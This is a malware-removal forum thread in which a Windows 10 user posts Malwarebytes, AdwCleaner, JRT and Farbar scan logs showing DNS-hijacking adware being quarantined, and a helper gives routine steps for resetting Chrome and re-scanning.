PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS|NameServer, Replaced, [46], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS|DhcpNameServer, Replaced, [46], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{0d251055-31ed-48ea-b574-65a04995c8e1}|NameServer, Replaced, [46], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{233b3be6-3a13-4215-9df0-79c7b19ef857}|NameServer, Replaced, [46], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{233b3be6-3a13-4215-9df0-79c7b19ef857}|DhcpNameServer, Replaced, [46], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{2d1fd792-4a77-47a7-856f-7fba5303331a}|NameServer, Replaced, [46], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{2d1fd792-4a77-47a7-856f-7fba5303331a}|DhcpNameServer, Replaced, [46], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{53DD74C5-F1D5-44B3-BC64-FE64C0F20AF1}|NameServer, Replaced, [46], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{8718928d-cbeb-45ea-a621-800a9249001d}|NameServer, Replaced, [46], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{9ec270b1-c6a4-454b-bfbf-ee40f8d875f6}|NameServer, Replaced, [46], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{9ec270b1-c6a4-454b-bfbf-ee40f8d875f6}|DhcpNameServer, Replaced, [46], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{adee8c85-6405-43ab-b5ce-70bbec9c5305}|NameServer, Replaced, [46], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{e5a2d9d9-828e-453f-8fae-e6e1988b15eb}|NameServer, Replaced, [46], [-1],0.0.0
Trojan.DNSChanger.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS|NAMESERVER, Replaced, [7700], [293494],1.0.1422

Data Stream: 0
(No malicious items detected)

Folder: 4
PUP.Optional.DNSUnlocker.ACMB2, C:\PROGRAMDATA\d949e265-3795-0, Quarantined, [46], [182288],1.0.1422
PUP.Optional.DNSUnlocker.ACMB2, C:\PROGRAMDATA\{43520dcd-612c-1}, Quarantined, [46], [182289],1.0.1422
PUP.Optional.DNSUnlocker.ACMB2, C:\PROGRAMDATA\{5c8f6aa7-612c-0}, Quarantined, [46], [182289],1.0.1422
Adware.Agent.Generic, C:\PROGRAMDATA\{71C75252-C66C-E5F9-9497-4BAF4FE285CA}, Quarantined, [1716], [331038],1.0.1422

File: 10
PUP.Optional.DNSUnlocker.ACMB2, C:\WINDOWS\SYSTEM32\TASKS\{087F0D47-047E-057E-7911-7879097A110A}, Quarantined, [46], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, C:\ProgramData\{43520dcd-612c-1}\BITC085.tmp, Quarantined, [46], [182289],1.0.1422
PUP.Optional.DNSUnlocker.ACMB2, C:\ProgramData\{5c8f6aa7-612c-0}\BITC0E4.tmp, Quarantined, [46], [182289],1.0.1422
Adware.Elex, C:\PROGRAMDATA\EA2CB491\DDB08C37.DLL, Quarantined, [305], [375719],1.0.1422
Adware.Agent.Generic, C:\PROGRAMDATA\{71C75252-C66C-E5F9-9497-4BAF4FE285CA}\4630C17C-F19B-76D7-D36D-40D2603D087A.EXE, Quarantined, [1716], [331038],1.0.1422
PUP.Optional.CrossRider, C:\USERS\007\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOCAL STORAGE\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage, Quarantined, [307], [256629],1.0.1422
PUP.Optional.CrossRider, C:\USERS\007\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOCAL STORAGE\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage-journal, Quarantined, [307], [256629],1.0.1422
PUP.Optional.Yontoo, C:\USERS\007\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOCAL STORAGE\http_static.coupontime00.coupontime.co_0.localstorage, Quarantined, [71], [304355],1.0.1422
PUP.Optional.Yontoo, C:\PROGRAMDATA\NTUSER.POL, Removal Failed, [71], [-1],0.0.0
PUP.Optional.Yontoo, C:\USERS\007\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOCAL STORAGE\http_static.coupontime00.coupontime.co_0.localstorage-journal, Quarantined, [71], [304355],1.0.1422

Physical Sector: 0
(No malicious items detected)


(end)
 
So I decided to run AdwCleaner. A couple of files were found that needed to be cleaned. The program suggested a restart, which I did. This time I was able to log back in under my account. I will post the contents of the next log as soon as I finish running it.


# AdwCleaner v6.044 - Logfile created 03/03/2017 at 20:55:56
# Updated on 28/02/2017 by Malwarebytes
# Database : 2017-03-02.1 [Server]
# Operating System : Windows 10 Home (X64)
# Username : 007 - SHIVANG
# Running from : C:\Users\007\Desktop\AdwCleaner.exe
# Mode: Clean
# Support : https://www.malwarebytes.com/support



***** [ Services ] *****



***** [ Folders ] *****

[-] Folder deleted: C:\ProgramData\ea2cb491


***** [ Files ] *****



***** [ DLL ] *****



***** [ WMI ] *****



***** [ Shortcuts ] *****



***** [ Scheduled Tasks ] *****



***** [ Registry ] *****

[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564


***** [ Web browsers ] *****



*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [3119 Bytes] - [23/01/2017 19:36:06]
C:\AdwCleaner\AdwCleaner[C2].txt - [1604 Bytes] - [26/01/2017 04:51:07]
C:\AdwCleaner\AdwCleaner[C3].txt - [1026 Bytes] - [03/03/2017 20:55:56]
C:\AdwCleaner\AdwCleaner[S0].txt - [3240 Bytes] - [23/01/2017 19:34:25]
C:\AdwCleaner\AdwCleaner[S1].txt - [1685 Bytes] - [26/01/2017 04:50:05]
C:\AdwCleaner\AdwCleaner[S2].txt - [1487 Bytes] - [03/03/2017 20:35:07]

########## EOF - C:\AdwCleaner\AdwCleaner[C3].txt - [1318 Bytes] ##########
 
This program ran with no issues.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.1 (02.11.2017)
Operating System: Windows 10 Home x64
Ran by 007 (Administrator) on Fri 03/03/2017 at 21:10:31.34
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 1

Successfully deleted: C:\Users\007\desktop\Continue Blaze ImgConvert Installation.lnk (File)



Registry: 1

Successfully deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\\GoogleChromeAutoLaunch_D61B85333F3CD95B073389B3076505BE (Registry Value)




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Fri 03/03/2017 at 21:12:16.19
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
So, other than the fact that I no longer see my bookmarks toolbar, it seems to be running alright so far. I can click on the above links without being redirected to some random page telling me I have a virus. Once again I should mention that up until recently the pop-ups to random websites were coming maybe a few times a day. I will continue using it and see what happens.
 
Just in case it happens again...

Reset Chrome...
Click on "Customize and control Google Chrome":

Click "Settings" then "Show advanced settings" at the bottom of the screen.
Click "Reset browser settings" button.
Restart Chrome.

If the above didn't help....

Reinstall Chrome...
If you want to save your bookmarks...
How to Backup Bookmarks in Google Chrome
If you want to save your passwords as well see here: http://www.intowindows.com/how-to-backup-saved-passwords-in-google-chrome-browser/
  • Close all Chrome windows and tabs.
  • Go to the Start menu > Control Panel. (Windows 8 users: Learn how to access the Control Panel)
  • Click Programs and Features.
  • Double-click Google Chrome.
  • Click Uninstall from the confirmation dialog. Delete your user profile information, like your browser preferences, bookmarks, and history, by selecting the "Also delete your browsing data" checkbox.
Install a fresh copy.

====================================

As for bookmarks toolbar see if this will help: https://www.lifewire.com/how-to-always-show-the-google-chrome-bookmarks-bar-4103621

Next...

Re-run the Farbar Recovery Scan Tool (FRST/FRST64) you ran at the very beginning of this topic.

  • Double click to run it.
  • Make sure you checkmark the Addition.txt box.
  • Press the Scan button.
  • The scan will create two logs, FRST.txt and Addition.txt, in the same directory the tool is run from. Please copy and paste them into your reply.
 
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:04-10-2015
Ran by 007 (administrator) on SHIVANG (03-03-2017 21:55:50)
Running from C:\Users\007\Desktop
Loaded Profiles: 007 (Available Profiles: 007)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool:

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyCriticalService.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyConfigTDPService.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyLpmService.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Windows\System32\ibtsiva.exe
(Intel Corporation) C:\Windows\System32\DptfParticipantProcessorService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\ibtrksrv.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Lenovo Smart Voice\LsvUIService.exe
(Nitro PDF Software) C:\Program Files\Common Files\Nitro\Pro\8.0\NitroPDFDriverService8x64.exe
(Nalpeiron Ltd.) C:\Windows\SysWOW64\NLSSRV32.EXE
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(PointGrab LTD) C:\Program Files (x86)\Lenovo\Motion Control\PGService.exe
(Hewlett-Packard) C:\Program Files (x86)\Examsoft\Softest 11.0\Examsoft.ShieldRunner.exe
(Motorola) C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
() C:\Program Files\CyberLink\Shared files\RichVideo64.exe
(Lenovo) C:\Program Files\Lenovo Yoga PhoneCompanion\PhoneCompanionPusher.exe
(Lenovo) C:\ProgramData\LenovoTransition\Server\x64\ymc.exe
Failed to access process -> Memory Compression
(Examsoft Worldwide Inc.) C:\Program Files (x86)\Examsoft\Softest 11.0\Examsoft.SoftShield.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgent.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgentUserBroker.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.17012.10301.0_x64__8wekyb3d8bbwe\Video.UI.exe
() C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.214.10010.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
(Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(VideoLAN) C:\Program Files\VideoLAN\VLC\vlc.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [DptfPolicyLpmServiceHelper] => C:\WINDOWS\system32\DptfPolicyLpmServiceHelper.exe [111976 2013-08-02] (Intel Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13653208 2013-09-12] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1321688 2013-08-30] (Realtek Semiconductor)
HKLM\...\Run: [RtsFT] => C:\WINDOWS\RTFTrack.exe [6340312 2013-07-19] (Realtek semiconductor)
HKLM\...\Run: [IgfxTray] => C:\windows\system32\igfxtray.exe [401896 2016-11-01] ()
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-07] (Intel Corporation)
HKLM\...\Run: [Yoga PhoneCompanion] => C:\Program Files\Lenovo Yoga PhoneCompanion\Yoga Phone Companion.exe [844304 2013-10-26] (Lenovo)
HKLM\...\Run: [AutoStartTransition] => C:\Program Files (x86)\Lenovo\Lenovo Transition\Transition.exe [294672 2013-10-26] ()
HKLM\...\Run: [Energy Manager] => C:\Program Files (x86)\Lenovo\Energy Manager\Energy Manager.exe [59925488 2013-10-26] (Lenovo(beijing) Limited)
HKLM\...\Run: [Lenovo Utility] => C:\Program Files (x86)\Lenovo\Energy Manager\Utility.exe [80880 2013-10-26] (Lenovo(beijing) Limited)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3944136 2015-06-03] (Synaptics Incorporated)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [176440 2016-11-01] (Apple Inc.)
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [631808 2016-09-24] (Microsoft Corporation)
HKLM-x32\...\Run: [Lenovo App Shop] => C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\ismagent.exe [156000 2013-07-18] (Intel Corporation)
HKLM-x32\...\Run: [Yoga Picks] => C:\Program Files (x86)\Lenovo\Yoga Picks\Yoga Picks.exe [90640 2013-07-09] (Lenovo)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [598552 2016-06-22] (Oracle Corporation)
HKLM\...\Policies\Explorer: [NoFolderOptions] 0
HKLM\...\Policies\Explorer: [NoControlPanel] 0
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\Run: [AirDroid 3] => C:\Program Files (x86)\AirDroid\AirDroid.exe [8696832 2016-08-04] (Sand Studio)
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9292504 2016-12-21] (Piriform Ltd)
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\Run: [GoogleChromeAutoLaunch_D61B85333F3CD95B073389B3076505BE] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [1116504 2017-02-01] (Google Inc.)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-11-01] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-11-01] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-11-01] (Microsoft Corporation)
Startup: C:\Users\007\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2016-11-07]
ShortcutTarget: Send to OneNote.lnk -> C:\Program Files\Microsoft Office 15\root\office15\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install LastPass IE RunOnce.lnk [2015-11-07]
ShortcutTarget: Install LastPass IE RunOnce.lnk -> C:\Program Files (x86)\Common Files\lpuninstall.exe (LastPass)
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\Parameters: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{0d251055-31ed-48ea-b574-65a04995c8e1}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{0dde9330-8214-11e6-8a54-806e6f6e6963}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{233b3be6-3a13-4215-9df0-79c7b19ef857}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{233b3be6-3a13-4215-9df0-79c7b19ef857}: [DhcpNameServer] 8.8.8.8
Tcpip\..\Interfaces\{2d1fd792-4a77-47a7-856f-7fba5303331a}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{2d1fd792-4a77-47a7-856f-7fba5303331a}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{53DD74C5-F1D5-44B3-BC64-FE64C0F20AF1}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{8718928d-cbeb-45ea-a621-800a9249001d}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{9ec270b1-c6a4-454b-bfbf-ee40f8d875f6}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{9ec270b1-c6a4-454b-bfbf-ee40f8d875f6}: [DhcpNameServer] 8.8.8.8
Tcpip\..\Interfaces\{adee8c85-6405-43ab-b5ce-70bbec9c5305}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{e5a2d9d9-828e-453f-8fae-e6e1988b15eb}: [NameServer] 8.8.8.8

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://home.lenovo.com
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = hxxp://home.lenovo.com
SearchScopes: HKLM -> DefaultScope {DA333138-ED30-42B1-BFA9-F83C9197A11D} URL =
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2016-12-13] (Microsoft Corporation)
BHO: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program Files (x86)\LastPass\LPToolbar_x64.dll [2015-11-07] (LastPass)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2016-11-01] (Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll [2016-12-13] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\ssv.dll [2016-08-04] (Oracle Corporation)
BHO-x32: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program Files (x86)\LastPass\LPToolbar.dll [2015-11-07] (LastPass)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-11-01] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\jp2ssv.dll [2016-08-04] (Oracle Corporation)
Toolbar: HKLM - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} - C:\Program Files (x86)\LastPass\LPToolbar_x64.dll [2015-11-07] (LastPass)
Toolbar: HKLM-x32 - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} - C:\Program Files (x86)\LastPass\LPToolbar.dll [2015-11-07] (LastPass)
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2016-07-29] (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2012-06-01] (Skype Technologies)
Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\System32\tbauth.dll [2016-07-16] (Microsoft Corporation)
Handler-x32: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll [2016-07-16] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\007\AppData\Roaming\Mozilla\Firefox\Profiles\2yh9pvk0.default
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_24_0_0_221.dll [No File]
FF Plugin: @lastpass.com/NPLastPass -> C:\Program Files (x86)\LastPass\nplastpass64.dll [2015-11-07] (LastPass)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_24_0_0_221.dll [No File]
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2015-12-29] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2015-12-29] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2015-12-29] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2015-12-29] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\PROGRAM FILES (X86)\FOXIT SOFTWARE\FOXIT READER\plugins\npFoxitReaderPlugin.dll [2015-02-11] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf -> C:\PROGRAM FILES (X86)\FOXIT SOFTWARE\FOXIT READER\plugins\npFoxitReaderPlugin.dll [2015-02-11] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xdp -> C:\PROGRAM FILES (X86)\FOXIT SOFTWARE\FOXIT READER\plugins\npFoxitReaderPlugin.dll [2015-02-11] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xfdf -> C:\PROGRAM FILES (X86)\FOXIT SOFTWARE\FOXIT READER\plugins\npFoxitReaderPlugin.dll [2015-02-11] (Foxit Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-08-08] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-08-08] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\dtplugin\npDeployJava1.dll [2016-08-04] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\plugin2\npjp2.dll [2016-08-04] (Oracle Corporation)
FF Plugin-x32: @lastpass.com/NPLastPass -> C:\Program Files (x86)\LastPass\nplastpass64.dll [2015-11-07] (LastPass)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-07-12] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2015-11-08] (Microsoft Corporation)
FF Plugin-x32: @nitropdf.com/NitroPDF -> C:\Program Files (x86)\Nitro\Pro 8\npnitromozilla.dll [2013-06-28] (Nitro PDF)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
